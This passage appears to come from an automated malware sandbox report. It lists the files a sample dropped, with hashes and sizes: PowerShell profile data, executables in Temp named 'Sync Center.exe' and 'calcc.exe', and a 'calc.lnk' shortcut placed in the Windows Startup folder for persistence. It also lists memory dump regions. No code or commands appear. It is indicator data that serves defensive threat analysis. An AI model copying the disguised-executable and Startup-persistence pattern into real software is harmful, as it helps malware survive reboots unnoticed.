        SHA256

        9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

        SHA512

        d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        47605a4dda32c9dff09a9ca441417339

        SHA1

        4f68c895c35b0dc36257fc8251e70b968c560b62

        SHA256

        e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

        SHA512

        b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        9c740b7699e2363ac4ecdf496520ca35

        SHA1

        aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

        SHA256

        be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

        SHA512

        8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        dd1d0b083fedf44b482a028fb70b96e8

        SHA1

        dc9c027937c9f6d52268a1504cbae42a39c8d36a

        SHA256

        cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

        SHA512

        96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        7358d98a96a32bfd7b52edf1a2c8c769

        SHA1

        ea182726b5823eb601fcb074e1c474f517f33111

        SHA256

        c74106ff4368d3a144ff314bcc28c76bf7248ffda3298fdf382114edc8d829d2

        SHA512

        c47601543dbeb0d927da17df8d60752da3a12300b8c529d74439ffba6789a58b16dd62d11b2ba3f9e2f68034b55d4fdb2268405549cc3f001508fb470ce5e814

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        5cfe303e798d1cc6c1dab341e7265c15

        SHA1

        cd2834e05191a24e28a100f3f8114d5a7708dc7c

        SHA256

        c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab

        SHA512

        ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        0256bd284691ed0fc502ef3c8a7e58dc

        SHA1

        dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

        SHA256

        e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

        SHA512

        c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        ba169f4dcbbf147fe78ef0061a95e83b

        SHA1

        92a571a6eef49fff666e0f62a3545bcd1cdcda67

        SHA256

        5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

        SHA512

        8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        e3b6cc0fbea08a0831f0026a696db8b8

        SHA1

        4e32202d4700061cfd80d55e42798131c9f530d4

        SHA256

        3284cae7b82be99d93064390ba071ba4321f3f24dd21515b37b2ca9f31b2e8d5

        SHA512

        6a06856f360b48c8bc8a15ffb8d7a6604ec357bcb1d0fad5d71a2cb876929a7b67eb40ba4493998ab1bbae8cb71212e124276f27d5c138a135041c27a41a0b7a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        da5c82b0e070047f7377042d08093ff4

        SHA1

        89d05987cd60828cca516c5c40c18935c35e8bd3

        SHA256

        77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

        SHA512

        7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6e09573715495338a569f0316d59af57

        SHA1

        1a9fd3073801c241b276cdb8b3d7035afbcd0c8d

        SHA256

        bdad2d4c1b3475754cb3b9ef41a9eda243f46e30117539f81399c977a459b570

        SHA512

        61add4e0cfef5f138e95f0d941c39c0bce038a47fbc262d5622a0fdf46621231653adfcca3b81bef3a662a37c288e1e9644bed44591551aea5399a370afaeced

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        3db1c0d23daacf01eb99125ccc2787d3

        SHA1

        0849528de1ba411279231d635d8f39d54cc829d2

        SHA256

        bceb96f5c3d31447980eb8cd891bba75b3e5b6eb60abf4d829fc13cd8faf2582

        SHA512

        3d84635a3395bca1d91ce182ccfb9e38c8da87ad678704673a72d580e4251cedc5a6b2a89040a172a5687b67952e74a13673bd115bce7bdabaed06f89323de5b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        60945d1a2e48da37d4ce8d9c56b6845a

        SHA1

        83e80a6acbeb44b68b0da00b139471f428a9d6c1

        SHA256

        314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

        SHA512

        5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        15dde0683cd1ca19785d7262f554ba93

        SHA1

        d039c577e438546d10ac64837b05da480d06bf69

        SHA256

        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

        SHA512

        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6f20cf4e5327af4ee77e36f560cb0594

        SHA1

        b90b770a8713b7263109fe7a6d7782590c075d97

        SHA256

        b15bed685d4f21065d1a63898d0731537fe93b655d7833ffb06d512a92a529d5

        SHA512

        bfba81bc0010b837c2d1c2cc4de9da2b0e86517d723fb6e420edfa9c3b41851f21a9a757b84a0b70e4dc217d8bd3263d11704aae77e72a13f1413b95c7a19089

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        3072fa0040b347c3941144486bf30c6f

        SHA1

        e6dc84a5bd882198583653592f17af1bf8cbfc68

        SHA256

        da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

        SHA512

        62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6dceabe4fa04675b346d77bdb6f001b6

        SHA1

        f7e0a381146b85d36cd7010faca05d26950a3c13

        SHA256

        32dd8227622e50d2938effe8f870632b0105a9906baf4a0779b48511fb214204

        SHA512

        b7c611cba5e55f72a8656b98ca056f44fe869c90629143b0ba27ddc02d3afe79690671130e541c434540cb485c1bd31cb3ac4e4b8129ec4bac2ae58f1a5bd9ad

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        ef72c47dbfaae0b9b0d09f22ad4afe20

        SHA1

        5357f66ba69b89440b99d4273b74221670129338

        SHA256

        692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

        SHA512

        7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        68872b6dd2f77bf87f172245af29986b

        SHA1

        e22441da79cd654f46ba91ff324c941eaec7cc77

        SHA256

        b92976db1c044aa4b8774bf02ad6cff7267e2153fc6e1b569783953ec743b4a1

        SHA512

        2ca87aa20e3a9abc57604105fa257db31f884b8d189eb622b971db8f877c2b4b49c6041d86f8d54627930c306601ca8941a2fb8f027a4f7723f9042ced1bcf40

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        eb033be02578f9635ec47bdc1de5c3fb

        SHA1

        ec356bc87381354a06baa9c30e8c3ac3d30e0f6f

        SHA256

        bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063

        SHA512

        4d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        3b444d3f0ddea49d84cc7b3972abe0e6

        SHA1

        0a896b3808e68d5d72c2655621f43b0b2c65ae02

        SHA256

        ab075b491d20c6f66c7bd40b57538c1cfdaab5aac4715bfe3bbc7f4745860a74

        SHA512

        eb0ab5d68472ec42de4c9b6d84306d7bca3874be1d0ac572030a070f21a698432418068e1a6006ff88480be8c8f54c769dee74b2def403f734109dba7261f36b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        aeceee3981c528bdc5e1c635b65d223d

        SHA1

        de9939ed37edca6772f5cdd29f6a973b36b7d31b

        SHA256

        b99f3c778a047e0348c92c16e0419fa29418d10d0fec61ad8283e92a094a2b32

        SHA512

        df48285f38e9284efdbd9f8d99e2e94a46fb5465953421ab88497b73ae06895b98ea5c98796560810a6f342c31a9112ea87e03cd3e267fd8518d7585f492a8fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        e60eb305a7b2d9907488068b7065abd3

        SHA1

        1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

        SHA256

        ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

        SHA512

        95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        Filesize

        121KB

        MD5

        7b6c19c2c8fc4ff9cc5b136f22cf490d

        SHA1

        e557a697a268c54a73aaffd02d25e54c4f601719

        SHA256

        cf6c9880812d48fe7ba3a1d1a1692a881745a7fb8cf6534f94555dd7dd1c3353

        SHA512

        afe23d16011e1eb71ce3be9f8796cf0398cc9e01415c93cd4e8403f1ee84f48e23396ab7709b60d5a9e5b3e5daee9e8f90bae99e6a85ece6475fa8bdd82f953b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lz3swapr.orr.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\calcc.exe
        Filesize

        71KB

        MD5

        36686a659c023c60d85630ef9080ee34

        SHA1

        c26facc03073d700fc65af33eb2d8a6215f065b6

        SHA256

        eadd6fd65960900c14dd8e18a16348ec4c6f766e6316428f8cf659d02b43fb49

        SHA512

        236eab23ae8a565532ffd063a7e31ecc9aa835c63ca243c15ddba652f639dc5249589340812299e523156ac8695571877d1af78c2a481f0b2527d90aa00c3587

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc.lnk
        Filesize

        971B

        MD5

        f8a2c3c658d4e32925843398eb07ce77

        SHA1

        cdb939dcded622d1292a882b54d0f2ff0551e27b

        SHA256

        111bba1c26079286d56eba82961359af95e09920a755e7cc5236aa3863857474

        SHA512

        9e1a97952c1cdaca2794cfa7dfa96dd05a31c118a7914f8b7eb98e3d64ff2f937b3d00a33a6ac46a0e1834a5155977cc052006bfea6f05ccf5564131f6033873

        Download Submit

      • memory/540-75-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-74-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-68-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-69-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-70-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-80-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-79-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-78-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-77-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/540-76-0x000002C683690000-0x000002C683691000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2484-66-0x00000000007C0000-0x00000000007E4000-memory.dmp

        Filesize

        144KB

        Download

      • memory/3204-14-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3204-18-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3204-3-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3204-13-0x000002BA5E060000-0x000002BA5E082000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3204-15-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3516-42-0x0000000000F80000-0x0000000000F98000-memory.dmp

        Filesize

        96KB

        Download

      • memory/4392-0-0x00007FFC10373000-0x00007FFC10375000-memory.dmp

        Filesize

        8KB

        Download

      • memory/4392-1-0x0000000000DB0000-0x0000000000E00000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4392-2-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4392-67-0x00007FFC10370000-0x00007FFC10E31000-memory.dmp

        Filesize

        10.8MB

        Download